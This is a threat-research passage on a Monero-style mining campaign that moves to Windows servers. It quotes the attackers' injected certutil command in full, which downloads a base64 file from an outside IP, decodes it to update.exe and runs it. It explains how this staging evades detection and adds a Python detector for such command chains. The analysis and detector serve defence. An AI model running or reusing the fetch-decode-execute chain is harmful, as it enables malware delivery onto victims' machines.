Old Dog, New Targets: Switching to Windows to Mine Electroneum

Figure 2: Latest attack request targeting Windows servers


As shown in Figure 2, the latest attack requests target the same URL, keep the same HTTP header values and reuse the same exploit structure; the difference is that the injected payload now consists of Windows shell commands that download and execute a file.

Using the Windows certutil Tool

While Linux ships with built-in command-line HTTP clients such as curl and wget, Windows has historically lacked a direct equivalent (only recent Windows 10 builds bundle a curl.exe). The common alternatives are to write a Visual Basic or PowerShell script, or to use the Windows BITSAdmin tool, which is normally used to create and manage download and upload jobs. We have already witnessed attackers leveraging BITSAdmin in other campaigns. The current attackers, however, chose a more creative technique, as the following injected commands show:

certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64 & certutil -decode update.b64 update.exe & update.exe

The attacker uses a command-line tool named “certutil” which, as described by Microsoft below, is part of the Windows operating system.

“Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.”

However, a lesser-known feature of the tool is fetching and caching files from remote hosts using the urlcache flag (in the command above, -split writes the fetched content to the named file and -f forces the download even if a cached copy exists). This is useful in attack scenarios and even provides a simple evasion capability: the payload travels over the network as a base64-encoded file in certificate format rather than as a raw executable, and is only turned back into a binary locally by the certutil -decode step, as shown in Figure 3.
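The two halves of this technique, as an added example that is not part of the original post and not code from the attackers or from Microsoft: a Python reconstruction of what a staged file produced with certutil -encode looks like (the PEM-style BEGIN/END CERTIFICATE lines and the 64-column wrapping are assumptions about the exact layout), and a small detector that runs over constructed process-creation command lines, flags certutil invocations that use -urlcache or -decode, and links the download, decode and execute steps of a chained command such as the one above. The sample command lines, the payload bytes and the 45.77.55.231 URL taken from the injected command are embedded inline so the script runs offline.

```python
import base64
import re

# Assumed layout of certutil -encode output: PEM-style header and footer
# around base64 wrapped at 64 columns. Reconstructed here for illustration.
CERT_HEADER = "-----BEGIN CERTIFICATE-----"
CERT_FOOTER = "-----END CERTIFICATE-----"


def certutil_style_encode(data: bytes) -> str:
    """Base64 the payload and wrap it like a certificate file, 64 columns."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([CERT_HEADER, *lines, CERT_FOOTER]) + "\r\n"


def certutil_style_decode(text: str) -> bytes:
    """Strip the header/footer lines and decode the base64 body."""
    body = [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.strip().startswith("-----")]
    return base64.b64decode("".join(body))


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# cmd.exe chaining operators used to glue the download/decode/run steps
CHAIN_RE = re.compile(r"\s*(?:&&|\|\||&)\s*")


def _basename(token: str) -> str:
    return token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_command_line(cmdline: str) -> dict:
    """Summarise certutil download / decode / execute behaviour in one line."""
    findings = {
        "certutil": False,            # certutil invoked at all
        "urlcache": False,            # -urlcache used (remote fetch)
        "decode": False,              # -decode used (base64 -> binary)
        "url": None,                  # URL fetched, if any
        "decoded_to": None,           # output file of -decode, if any
        "executes_decoded_file": False,
        "suspicious": False,
    }
    for segment in CHAIN_RE.split(cmdline):
        tokens = segment.split()
        if not tokens:
            continue
        exe = _basename(tokens[0])
        # a later segment that runs the file -decode produced
        if findings["decoded_to"] and exe == _basename(findings["decoded_to"]):
            findings["executes_decoded_file"] = True
        if exe not in ("certutil", "certutil.exe"):
            continue
        findings["certutil"] = True
        flags = {t.lower().lstrip("-/") for t in tokens[1:] if t[0] in "-/"}
        if "urlcache" in flags:
            findings["urlcache"] = True
            m = URL_RE.search(segment)
            if m:
                findings["url"] = m.group(0)
        if "decode" in flags:
            findings["decode"] = True
            findings["decoded_to"] = tokens[-1]   # last argument is the output
    findings["suspicious"] = findings["urlcache"] or findings["decode"]
    return findings


if __name__ == "__main__":
    # Constructed payload: a fake PE header so the "MZ" signature is visible.
    payload = b"MZ\x90\x00" + b"\x00" * 60
    staged = certutil_style_encode(payload)
    print(staged)
    print("raw 'MZ' visible in staged file:", "MZ" in staged)
    print("round-trip ok:", certutil_style_decode(staged) == payload)

    # Constructed process-creation command lines (not real logs).
    samples = [
        "certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64 "
        "& certutil -decode update.b64 update.exe & update.exe",
        "certutil -verify C:\\certs\\server.cer",
        "C:\\Windows\\System32\\certutil.exe -URLCache -f http://example.invalid/a.txt a.txt",
    ]
    for line in samples:
        print(analyze_command_line(line))
```

The detector treats any -urlcache or -decode use as suspicious; some installers and admin scripts use -urlcache legitimately, so in production the rule should be tuned on the parent process and the fetched URL, and the strongest signal is the full chain (fetch, decode, then execute the decoded file in one command line).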
